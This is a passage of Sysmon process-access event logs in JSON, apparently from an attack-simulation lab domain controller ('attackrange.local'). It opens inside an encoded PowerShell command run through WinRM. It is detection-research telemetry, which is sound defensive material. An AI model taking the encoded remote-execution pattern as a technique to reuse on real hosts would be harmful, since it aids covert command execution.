AQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","ParentProcessId":"5064","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-0010F7800800}\r\nSourceProcessId: 5064\r\nSourceThreadId: 5012\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-0010F7800800}","SourceProcessId":"5064","SourceThreadId":"5012","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010226F0600}\r\nTargetProcessId: 4184\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010226F0600}","TargetProcessId":"4184","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:20.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:20.370\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 